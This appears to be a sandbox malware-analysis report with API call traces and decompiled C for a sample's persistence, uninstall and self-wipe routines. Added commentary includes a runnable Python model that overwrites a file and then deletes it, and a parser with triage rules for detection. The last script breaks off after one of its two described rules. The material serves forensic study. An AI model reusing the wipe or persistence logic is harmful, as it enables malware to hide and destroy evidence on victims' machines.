    0x00408ffa
    0x00409000
    0x00409000
    0x00408ffa
    0x0040900b
    0x0040900b
    0x00409010
    0x00409010
    0x0040901a
    0x00000000
    0x00408fb5
    0x00408fb5
    0x00408fba
    0x00408fbd
    0x00408fc1
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00408fc3
    0x00408fc3
    0x00408fc8
    0x00408fce
    0x00408fd1
    0x00408fd1
    0x00000000
    0x00408fc3
    0x00408f0c
    0x00408f11
    0x00408f14
    0x00408f19
    0x0040901f
    0x00409024
    0x0040902c
    0x00409036
    0x0040903b
    0x00409041
    0x00409046
    0x0040904b
    0x0040905a
    0x00409062
    0x00409067
    0x00409072
    0x00409072

    APIs
      • Part of subcall function 004044F0: GetVersionExA.KERNEL32(0000009C), ref: 0040451A
    • GetCurrentProcess.KERNEL32 ref: 00408D33
      • Part of subcall function 004042D4: OpenProcessToken.ADVAPI32(?,00000008,?), ref: 004042EC
      • Part of subcall function 004042D4: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 0040430E
      • Part of subcall function 004042D4: GetLastError.KERNEL32 ref: 00404322
      • Part of subcall function 004042D4: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 00404358
      • Part of subcall function 004042D4: GetSidSubAuthorityCount.ADVAPI32(?), ref: 0040436E
      • Part of subcall function 004042D4: GetSidSubAuthority.ADVAPI32(?,?), ref: 00404393
      • Part of subcall function 004042D4: CloseHandle.KERNEL32(?), ref: 004043F3
    • GetCurrentProcess.KERNEL32 ref: 00408D5D
    • GetCurrentProcess.KERNEL32 ref: 00408D77
      • Part of subcall function 0040453C: GetCurrentProcess.KERNEL32 ref: 00404555
      • Part of subcall function 0040453C: IsWow64Process.KERNEL32(00000000,?), ref: 0040456F
      • Part of subcall function 004079BC: RtlInitializeCriticalSection.NTDLL(0040BE04), ref: 00407A14
      • Part of subcall function 004079BC: RtlInitializeCriticalSection.NTDLL(0040C234), ref: 00407A2E
    • LocalAlloc.KERNEL32(00000000,00000014), ref: 00408D94
      • Part of subcall function 00404408: InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 0040441F
      • Part of subcall function 00404408: SetSecurityDescriptorDacl.ADVAPI32(?,000000FF,00000000,00000000), ref: 00404437
      • Part of subcall function 00404408: ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00401CB4,00000001,?,00000000), ref: 00404453
      • Part of subcall function 00404408: GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00404478
      • Part of subcall function 00404408: SetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00404498
      • Part of subcall function 00404408: LocalFree.KERNEL32(?), ref: 004044AC
    • CreateMutexA.KERNEL32(?,00000000,00401CC8), ref: 00408DB4
    • LocalFree.KERNEL32(?), ref: 00408DC3
      • Part of subcall function 00408BFC: RegOpenKeyExA.ADVAPI32(80000002,00402174,00000000,00020119,?), ref: 00408C1B
      • Part of subcall function 00407984: GetVolumeInformationA.KERNEL32(004021D0,00000000,00000000,0040B110,?,?,00000000,00000000), ref: 004079A5
      • Part of subcall function 004089D4: GetVolumeInformationA.KERNEL32(004021D0,00000000,00000000,?,?,?,00000000,00000000), ref: 004089F4
      • Part of subcall function 00407A44: GetModuleFileNameA.KERNEL32(00000000,?,00000401), ref: 00407A67
    • RtlInitializeCriticalSection.NTDLL(0040BE04), ref: 00408E0C
      • Part of subcall function 004047AC: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004047D9
      • Part of subcall function 004047AC: CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004047FB
      • Part of subcall function 004047AC: GetFileSize.KERNEL32(?,00000000), ref: 00404810
      • Part of subcall function 004047AC: ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0040483F
      • Part of subcall function 004047AC: CloseHandle.KERNEL32(?), ref: 00404849
      • Part of subcall function 00407304: RegOpenKeyExA.ADVAPI32(80000002,004021A4,00000000,000F003F,?), ref: 00407331
      • Part of subcall function 00407304: RegOpenKeyExA.ADVAPI32(80000001,004021A4,00000000,000F003F,?), ref: 00407352
      • Part of subcall function 0040471C: CreateThread.KERNEL32(00000000,00000000,Function_00004608,?,00000000,?), ref: 00404777
      • Part of subcall function 0040471C: SetThreadPriority.KERNEL32(?,000000F1), ref: 00404786
      • Part of subcall function 0040471C: CloseHandle.KERNEL32(?), ref: 00404790
      • Part of subcall function 00404A1C: RegDeleteValueA.ADVAPI32(?,?), ref: 00404A55
      • Part of subcall function 00408B98: SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,000000FF), ref: 00408BB2
      • Part of subcall function 00408B98: SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,000000FF), ref: 00408BD6
      • Part of subcall function 00408B6C: CreateThread.KERNEL32(00000000,00000000,Function_00008AA4,00000000,00000000,?), ref: 00408B81
      • Part of subcall function 00408B6C: CloseHandle.KERNEL32(?), ref: 00408B8E
      • Part of subcall function 00404BA0: GetComputerNameA.KERNEL32(?,00000101), ref: 00404BC3
      • Part of subcall function 00404BA0: RegOpenKeyExA.ADVAPI32(80000002,00402174,00000000,00020119,?), ref: 00404C01
      • Part of subcall function 00404BA0: GetVolumeInformationA.KERNEL32(004021D0,00000000,00000000,?,?,?,00000000,00000000), ref: 00404D40
      • Part of subcall function 00405468: GetSystemTime.KERNEL32(?), ref: 00405472
      • Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
      • Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454
      • Part of subcall function 00408064: RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 0040808B
      • Part of subcall function 00408064: RegDeleteValueA.ADVAPI32(?,?), ref: 0040809D
    • Sleep.KERNEL32(000003E8), ref: 00408FC8
    • GetCursorPos.USER32(?), ref: 00409000
      • Part of subcall function 00407474: RegCreateKeyExA.ADVAPI32(80000002,004021A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 0040750D
      • Part of subcall function 00407474: RegCreateKeyExA.ADVAPI32(80000001,004021A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00407533
      • Part of subcall function 004038DC: RtlEnterCriticalSection.NTDLL(?), ref: 004038E3
      • Part of subcall function 004038EC: RtlLeaveCriticalSection.NTDLL(?), ref: 004038F3
      • Part of subcall function 00405640: SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,000000FF), ref: 00405664
      • Part of subcall function 00405640: FindFirstFileA.KERNEL32(?,00000080), ref: 00405697
      • Part of subcall function 00405640: FindNextFileA.KERNEL32(000000FF,00000080), ref: 00405825
      • Part of subcall function 00405640: FindClose.KERNEL32(000000FF), ref: 0040583D
      • Part of subcall function 004084A4: Sleep.KERNEL32(00004E20), ref: 00408519
      • Part of subcall function 004084A4: GetTickCount.KERNEL32 ref: 004086EB
      • Part of subcall function 004084A4: Sleep.KERNEL32(00003A98), ref: 00408706
      • Part of subcall function 004084A4: RtlExitUserThread.NTDLL(00000000), ref: 00408879
      • Part of subcall function 004084A4: RtlExitUserThread.NTDLL(00000000), ref: 004088B6
      • Part of subcall function 004084A4: Sleep.KERNEL32(000003E8), ref: 0040895F
    • RtlExitUserThread.NTDLL(00000000), ref: 00409069
      • Part of subcall function 004041CC: GetCurrentThread.KERNEL32 ref: 004041DE
      • Part of subcall function 004041CC: OpenThreadToken.ADVAPI32(00000000), ref: 004041E5
      • Part of subcall function 004041CC: GetLastError.KERNEL32 ref: 004041F4
      • Part of subcall function 004041CC: GetCurrentProcess.KERNEL32 ref: 00404207
      • Part of subcall function 004041CC: OpenProcessToken.ADVAPI32(00000000), ref: 0040420E
      • Part of subcall function 004041CC: GetTokenInformation.ADVAPI32(?,00000002,?,00000400,?), ref: 00404241
      • Part of subcall function 004041CC: CloseHandle.KERNEL32(?), ref: 0040424E
      • Part of subcall function 004041CC: AllocateAndInitializeSid.ADVAPI32(0040A2A4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00404278
      • Part of subcall function 004041CC: EqualSid.ADVAPI32(?,?), ref: 004042A2
      • Part of subcall function 004041CC: FreeSid.ADVAPI32(?), ref: 004042BE
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • IsWindow.USER32(?), ref: 00413896
    • SendMessageA.USER32(?,?,?,?), ref: 004138AE
    • GetMenuItemCount.USER32 ref: 0041392A
    • GetVersionExA.KERNEL32(?), ref: 0041396B
    • GetMenuItemInfoA.USER32(?,00000000,00000001,0000002C), ref: 0041399F
    • lstrlen.KERNEL32(?,?,00000000,00000001,0000002C), ref: 004139D2
    • SetMenuItemInfoA.USER32(?,00000000,00000001,0000002C), ref: 004139ED
    • GetMenuItemCount.USER32 ref: 00413A10
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetModuleFileNameW.KERNEL32(00000000,00442CAA,00000104,00000001,?,00000000), ref: 00426404
      • Part of subcall function 00425114: GetCurrentProcess.KERNEL32 ref: 0042512A
      • Part of subcall function 00425114: TerminateProcess.KERNEL32(00000000), ref: 00425131
    • _wcslen.LIBCMT ref: 00426433
    • _wcslen.LIBCMT ref: 00426440
      • Part of subcall function 0042E40B: LoadLibraryW.KERNEL32(USER32.DLL,00442C78,00000314,00000000), ref: 0042E446
      • Part of subcall function 0042E40B: GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 0042E462
      • Part of subcall function 0042E40B: RtlEncodePointer.NTDLL(00000000), ref: 0042E473
      • Part of subcall function 0042E40B: GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0042E480
      • Part of subcall function 0042E40B: RtlEncodePointer.NTDLL(00000000), ref: 0042E483
      • Part of subcall function 0042E40B: GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0042E490
      • Part of subcall function 0042E40B: RtlEncodePointer.NTDLL(00000000), ref: 0042E493
      • Part of subcall function 0042E40B: GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 0042E4A0
      • Part of subcall function 0042E40B: RtlEncodePointer.NTDLL(00000000), ref: 0042E4A3
      • Part of subcall function 0042E40B: GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0042E4B4
      • Part of subcall function 0042E40B: RtlEncodePointer.NTDLL(00000000), ref: 0042E4B7
      • Part of subcall function 0042E40B: RtlDecodePointer.NTDLL(0044361C), ref: 0042E4D9
      • Part of subcall function 0042E40B: RtlDecodePointer.NTDLL ref: 0042E4E3
      • Part of subcall function 0042E40B: RtlDecodePointer.NTDLL(?), ref: 0042E522
      • Part of subcall function 0042E40B: RtlDecodePointer.NTDLL(?), ref: 0042E53C
      • Part of subcall function 0042E40B: RtlDecodePointer.NTDLL(00442C78), ref: 0042E550
    • GetStdHandle.KERNEL32(000000F4,00000001,?,00000000), ref: 004264B6
    • _strlen.LIBCMT ref: 004264F3
    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00426502
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(06D), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetParent.USER32(?), ref: 00411640
    • SendMessageA.USER32(00000000,0000040C,00000000,00000000), ref: 00411656
    • GetVersionExA.KERNEL32(?), ref: 0041169F
    • LoadLibraryA.KERNEL32(comctl32.dll), ref: 004116D6
    • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 004116EF
    • FreeLibrary.KERNEL32(00000000), ref: 0041170A
    • SendMessageA.USER32(00000000,0000041D,00000000,?), ref: 0041174F
    • PostMessageA.USER32(00000000,0000042B,00000000,00000000), ref: 00411797
    • PostMessageA.USER32(?,00000100,00000028,00000000), ref: 004117AA
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 90%
    			E004080C0(intOrPtr __eax) {
    				intOrPtr _v8;
    				char _v265;
    				void* _t13;
    				void* _t15;
    				char* _t27;
    				intOrPtr _t31;
    				void* _t33;
    				void* _t35;
    				signed int _t37;
    				signed int _t39;
    				char* _t42;
    				struct HWND__* _t48;
    				intOrPtr _t50;
    				char* _t60;
    				char* _t62;
    				void* _t63;
    
    				_v8 = __eax;
    				if( *0x40a038 != 0) {
    					_t50 =  *0x40a038; // 0x0
    					 *0x40b4f8(_t50);
    				}
    				 *0x40c24c = CreateEventA(0, 0xffffffff, 0, 0);
    				 *0x40a29c = 0xffffffff;
    				_t13 =  *0x40c24c; // 0x0
    				WaitForSingleObject(_t13, 0xffffffff);
    				_t15 =  *0x40c24c; // 0x0
    				CloseHandle(_t15);
    				E00401308( &_v265, 0x40b518);
    				 *((char*)(_t63 + E004012DC(0x40b518) - 0x109)) = 0;
    				E0040133C( &_v265, ".lnk");
    				E0040471C( &_v265, 0, 0);
    				E0040471C(0x40b518, 0x7530, 0xffffffff);
    				if( *0x40a574 != 0) {
    					_t48 =  *0x40a574; // 0x0
    					SendMessageA(_t48, 0x10, 0, 0);
    				}
    				if( *0x40a034 == 0) {
    					if(_v8 == 0) {
    						_t27 =  *0x40a260; // 0x4021a4
    						SHDeleteKeyA(0x80000001, _t27);
    					} else {
    						_t60 =  *0x40a260; // 0x4021a4
    						E00408064(0x80000001, 0x40b752, _t60);
    					}
    					E00404A1C(0x80000001,  &_v265);
    				} else {
    					if(_v8 == 0) {
    						_t42 =  *0x40a260; // 0x4021a4
    						SHDeleteKeyA(0x80000002, _t42);
    					} else {
    						_t62 =  *0x40a260; // 0x4021a4
    						E00408064(0x80000002, 0x40b752, _t62);
    					}
    					E00404A1C(0x80000002,  &_v265);
    				}
    				_t31 =  *0x40b510; // 0x0
    				E00401828(_t31);
    				_t33 =  *0x40a054; // 0x0
    				ReleaseMutex(_t33);
    				_t35 =  *0x40a054; // 0x0
    				CloseHandle(_t35);
    				_t37 =  *0x40a2a0; // 0x0
    				asm("sbb eax, eax");
    				_t39 =  ~( ~_t37);
    				if(_t39 == 0) {
    					ExitProcess(0);
    				}
    				return _t39;
    			}
    0x004080c9
    0x004080d3
    0x004080d5
    0x004080db
    0x004080db
    0x004080ef
    0x004080f4
    0x00408100
    0x00408106
    0x0040810c
    0x00408112
    0x00408123
    0x00408132
    0x00408146
    0x00408158
    0x0040816a
    0x00408176
    0x0040817e
    0x00408184
    0x00408184
    0x00408191
    0x004081d7
    0x004081f0
    0x004081fb
    0x004081d9
    0x004081de
    0x004081e9
    0x004081e9
    0x0040820c
    0x00408193
    0x00408197
    0x004081b0
    0x004081bb
    0x00408199
    0x0040819e
    0x004081a9
    0x004081a9
    0x004081cc
    0x004081cc
    0x00408211
    0x00408216
    0x0040821b
    0x00408221
    0x00408227
    0x0040822d
    0x00408233
    0x0040823a
    0x0040823c
    0x00408240
    0x00408244
    0x00408244
    0x0040824d

    APIs
    • RtlRemoveVectoredExceptionHandler.NTDLL(00000000), ref: 004080DB
    • CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000), ref: 004080E9
    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00408106
    • CloseHandle.KERNEL32(00000000), ref: 00408112
      • Part of subcall function 0040471C: CreateThread.KERNEL32(00000000,00000000,Function_00004608,?,00000000,?), ref: 00404777
      • Part of subcall function 0040471C: SetThreadPriority.KERNEL32(?,000000F1), ref: 00404786
      • Part of subcall function 0040471C: CloseHandle.KERNEL32(?), ref: 00404790
    • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 00408184
    • SHDeleteKeyA.SHLWAPI(80000002,004021A4), ref: 004081BB
    • ExitProcess.KERNEL32 ref: 00408244
      • Part of subcall function 00408064: RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 0040808B
      • Part of subcall function 00408064: RegDeleteValueA.ADVAPI32(?,?), ref: 0040809D
    • SHDeleteKeyA.SHLWAPI(80000001,004021A4), ref: 004081FB
      • Part of subcall function 00404A1C: RegDeleteValueA.ADVAPI32(?,?), ref: 00404A55
      • Part of subcall function 00401828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00406A2F), ref: 0040183A
    • ReleaseMutex.KERNEL32(00000000), ref: 00408221
    • CloseHandle.KERNEL32(00000000), ref: 0040822D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
    • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 0041F7AB
      • Part of subcall function 00423911: std::exception::exception.LIBCMT ref: 00423960
    • MessageBoxA.USER32(?,Failed to create document,Error,00000030), ref: 0041F803
    • MessageBoxA.USER32(?,Failed to create document,Error,00000030), ref: 0041F83F
    • LoadCursorA.USER32(00000000,00007F02), ref: 0041F895
    • SetCursor.USER32(00000000), ref: 0041F8A0
    • SetCursor.USER32(?), ref: 0041F8CC
    • MessageBoxA.USER32(?,Failed to open file,Error,00000030), ref: 0041F8FE
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 96%
    			E00404608(intOrPtr* _a4) {
    				int _v8;
    				CHAR* _v12;
    				long _v16;
    				void* _v20;
    				long _v24;
    				intOrPtr _v28;
    				long _v32;
    				char _v36;
    				void _v548;
    				signed int _t42;
    				char _t58;
    
    				_v8 = 0;
    				_v16 =  *_a4;
    				_v12 = _a4 + 4;
    				while(1) {
    					_t42 = E00403988(_v12);
    					asm("sbb eax, eax");
    					if( ~( ~_t42) == 0) {
    						break;
    					}
    					_v20 = CreateFileA(_v12, 0xc0000000, 0, 0, 3, 0x20000080, 0);
    					if(_v20 == 0xffffffff) {
    						L8:
    						_v8 = DeleteFileA(_v12);
    						if(_v8 != 0 || _v16 == 0) {
    							L13:
    							E00401440(_a4);
    							return _v8;
    						} else {
    							if(_v16 <= 0x64) {
    								Sleep(_v16);
    								_v16 = 0;
    							} else {
    								Sleep(0x64);
    								_v16 = _v16 - 0x64;
    							}
    							continue;
    						}
    					}
    					_v24 = GetFileSize(_v20, 0);
    					_t58 = (_v24 >> 9) + 1;
    					if(_t58 <= 0) {
    						L7:
    						FlushFileBuffers(_v20);
    						CloseHandle(_v20);
    						goto L8;
    					}
    					_v36 = _t58;
    					_v28 = 1;
    					do {
    						WriteFile(_v20,  &_v548, 0x200,  &_v32, 0);
    						_v28 = _v28 + 1;
    						_t21 =  &_v36;
    						 *_t21 = _v36 - 1;
    					} while ( *_t21 != 0);
    					goto L7;
    				}
    				_v8 = 0xffffffff;
    				goto L13;
    			}
    0x00404613
    0x0040461b
    0x00404624
    0x00404627
    0x0040462a
    0x00404631
    0x00404637
    0x00000000
    0x00000000
    0x00404661
    0x00404668
    0x004046c6
    0x004046d0
    0x004046d7
    0x0040470a
    0x0040470d
    0x00404718
    0x004046df
    0x004046e3
    0x004046fa
    0x00404702
    0x004046e5
    0x004046e7
    0x004046ed
    0x004046ed
    0x00000000
    0x004046e3
    0x004046d7
    0x00404676
    0x0040467f
    0x00404682
    0x004046b2
    0x004046b6
    0x004046c0
    0x00000000
    0x004046c0
    0x00404684
    0x00404687
    0x0040468e
    0x004046a4
    0x004046aa
    0x004046ad
    0x004046ad
    0x004046ad
    0x00000000
    0x0040468e
    0x00404639
    0x00000000

    APIs
      • Part of subcall function 00403988: FindFirstFileA.KERNEL32(?,?), ref: 004039A4
      • Part of subcall function 00403988: FindClose.KERNEL32(000000FF), ref: 004039BF
    • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,20000080,00000000), ref: 0040465B
    • GetFileSize.KERNEL32(000000FF,00000000), ref: 00404670
    • WriteFile.KERNEL32(000000FF,?,00000200,?,00000000), ref: 004046A4
    • FlushFileBuffers.KERNEL32(000000FF), ref: 004046B6
    • CloseHandle.KERNEL32(000000FF), ref: 004046C0
    • DeleteFileA.KERNEL32(?), ref: 004046CA
    • Sleep.KERNEL32(00000064), ref: 004046E7
    • Sleep.KERNEL32(00000064), ref: 004046FA
      • Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
      • Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454
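The function E00404608 listed above is the body of the thread that E0040471C starts (CreateThread with Function_00004608): it takes a millisecond budget from the first dword of its heap argument (_v16) and a path from offset 4 (_v12), checks that the file exists via the FindFirstFileA probe in E00403988, opens it with 0xC0000000 (GENERIC_READ|GENERIC_WRITE), disposition 3 (OPEN_EXISTING) and 0x20000080 (FILE_FLAG_NO_BUFFERING|FILE_ATTRIBUTE_NORMAL, which is why every write is one 0x200-byte sector), writes (size >> 9) + 1 blocks from _v548, a 512-byte stack buffer that is never initialised, flushes, closes and calls DeleteFileA. When the delete fails, typically because the image is still mapped by the parent process, it sleeps in 100 ms slices until the budget is spent, re-overwriting and retrying on every pass, and finally returns DeleteFileA's result; it returns -1 (0xffffffff) if the file is not there. Its callers pass 0x2ee0 (12 s) for the running sample's own path and 0x7530 (30 s) in the uninstall routine E004080C0; we take those values to be this retry budget, which the report does not state explicitly. The following Python model is an added example, not code from the report or from the sample: it reproduces the on-disk effect with POSIX calls (os.fsync stands in for FlushFileBuffers and the unbuffered handle, os.path.exists for the FindFirstFileA probe), with a fill byte of our choosing in place of the uninitialised stack data.

```python
"""Model of the self-wipe thread E00404608 (added example, not report code)."""
import os
import tempfile
import time

BLOCK = 0x200        # WriteFile length in the decompiled loop (one sector)
SLICE_MS = 0x64      # Sleep granularity while waiting to retry DeleteFileA


def overwrite_length(size):
    """Bytes the routine writes for a file of `size` bytes: (size >> 9) + 1
    blocks of 0x200. The '+ 1' rounds every file up to the next sector
    boundary and then adds one whole extra block."""
    return ((size >> 9) + 1) * BLOCK


def retry_slices(budget_ms):
    """Sleep calls issued for a retry budget (_v16): Sleep(0x64) while more
    than 0x64 ms remain, then Sleep(remainder) and the budget is zero."""
    slices = []
    while budget_ms > 0:
        step = budget_ms if budget_ms <= SLICE_MS else SLICE_MS
        slices.append(step)
        budget_ms -= step
    return slices


def wipe_and_delete(path, budget_ms=0, fill=b"\x00", sleep=time.sleep, stats=None):
    """Return value mirrors E00404608: 1 when the delete succeeded, 0 when it
    failed and the budget is spent, -1 when the file was not found."""
    if stats is None:
        stats = {}
    stats.setdefault("bytes_written", 0)
    stats.setdefault("passes", 0)
    block = (fill * BLOCK)[:BLOCK]          # stands in for the uninitialised _v548
    while True:
        if not os.path.exists(path):        # E00403988: FindFirstFileA probe
            return -1
        try:                                # CreateFileA(GENERIC_READ|GENERIC_WRITE, OPEN_EXISTING)
            fd = os.open(path, os.O_RDWR)
        except OSError:
            fd = -1                         # original goes straight to DeleteFileA on INVALID_HANDLE_VALUE
        if fd != -1:
            size = os.fstat(fd).st_size     # GetFileSize
            for _ in range(overwrite_length(size) // BLOCK):
                stats["bytes_written"] += os.write(fd, block)   # WriteFile(h, buf, 0x200, ...)
            os.fsync(fd)                    # FlushFileBuffers
            os.close(fd)                    # CloseHandle
            stats["passes"] += 1
        try:
            os.unlink(path)                 # DeleteFileA
            return 1
        except OSError:
            pass
        if budget_ms == 0:
            return 0
        step = budget_ms if budget_ms <= SLICE_MS else SLICE_MS
        sleep(step / 1000.0)                # Sleep(0x64) or Sleep(remainder)
        budget_ms -= step


def demo(size=1000, fill=b"\xcc"):
    """Create a throwaway file of `size` bytes, run the wipe with a no-op
    sleep, and report what happened. A second call shows the -1 path."""
    workdir = tempfile.mkdtemp(prefix="wipe_model_")
    path = os.path.join(workdir, "sample.bin")
    with open(path, "wb") as fh:
        fh.write(b"A" * size)
    stats = {}
    result = wipe_and_delete(path, budget_ms=0, fill=fill,
                             sleep=lambda _s: None, stats=stats)
    second = wipe_and_delete(path, budget_ms=300, sleep=lambda _s: None)
    os.rmdir(workdir)
    return {"result": result, "second_call": second,
            "exists_after": os.path.exists(path), **stats}


if __name__ == "__main__":
    print(demo())
```

Two details matter when triaging a disk image of an infected host: the overwrite always rounds up to the next 512-byte boundary and then adds a whole extra block, so a 512-byte file grows to 1024 bytes before it is unlinked, and because the fill comes from an uninitialised stack buffer rather than zeros, the freed sectors of the deleted file hold stack garbage, not a clean wipe pattern.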
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
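Every function entry in this report lists its calls in one line format: an optional "Part of subcall function XXXXXXXX:" prefix, then Name.MODULE(args) or Name.MODULE without arguments, then "ref:" and the call-site address, with arguments printed as eight hex digits, "?" for unknown values, and occasional annotations such as 00000019(TokenIntegrityLevel). The Python below, an added example and not part of the report or of the sample, parses that format and applies two triage rules drawn from what the entries for E00408D0C and E00404608 show: a writable CreateFile with an unbuffered or write-through flag followed by WriteFile, FlushFileBuffers and DeleteFile (the overwrite-before-unlink sequence of the wipe thread), and the same registry subkey touched under both HKCU (0x80000001) and HKLM (0x80000002), the "HKLM when elevated, else HKCU" split that the persistence code uses. The sample strings are copied from the report; the rule and helper names are ours, and the flag constants are the documented Win32 values.

```python
"""Parser and two triage rules for this report's API-call lines (added example)."""
import re

GENERIC_WRITE = 0x40000000
FILE_FLAG_NO_BUFFERING = 0x20000000
FILE_FLAG_WRITE_THROUGH = 0x80000000
HKEY_CURRENT_USER = 0x80000001
HKEY_LOCAL_MACHINE = 0x80000002

# "• Part of subcall function 004047AC: CreateFileA.KERNELBASE(?,80000000,...), ref: 004047D9"
# "• GetCurrentProcess.KERNEL32 ref: 00408D33"
LINE_RE = re.compile(
    r"^\s*[•*-]?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][\w:]*)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$")


def split_args(text):
    """Split on top-level commas only, so '00000019(TokenIntegrityLevel)' survives."""
    parts, depth, cur = [], 0, []
    for ch in text:
        depth += (ch == "(") - (ch == ")")
        if ch == "," and depth == 0:
            parts.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    parts.append("".join(cur).strip())
    return parts


def as_hex(arg):
    """'C0000000' or '00000019(TokenIntegrityLevel)' -> int; '?' and names -> None."""
    m = re.match(r"^([0-9A-Fa-f]{8})(?:\(.*\))?$", arg)
    return int(m.group(1), 16) if m else None


def parse_line(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    return {"api": m.group("api"), "module": m.group("mod"),
            "args": split_args(raw) if raw is not None else [],
            "ref": int(m.group("ref"), 16), "subcall": m.group("sub")}


def parse_trace(text):
    """All parsable call lines of one function entry, in report order."""
    return [c for c in map(parse_line, text.splitlines()) if c]


def wipe_then_delete(calls):
    """CreateFile with GENERIC_WRITE and an unbuffered/write-through flag, later
    followed by WriteFile, FlushFileBuffers and DeleteFile: the file is
    overwritten in place before it is unlinked."""
    want = ("WriteFile", "FlushFileBuffers", "DeleteFile")
    stage = 0
    for c in calls:
        if stage == 0:
            if c["api"].startswith("CreateFile") and len(c["args"]) >= 6:
                access, flags = as_hex(c["args"][1]), as_hex(c["args"][5])
                if (access or 0) & GENERIC_WRITE and \
                   (flags or 0) & (FILE_FLAG_NO_BUFFERING | FILE_FLAG_WRITE_THROUGH):
                    stage = 1
        elif c["api"].startswith(want[stage - 1]):
            stage += 1
            if stage > len(want):
                return True
    return False


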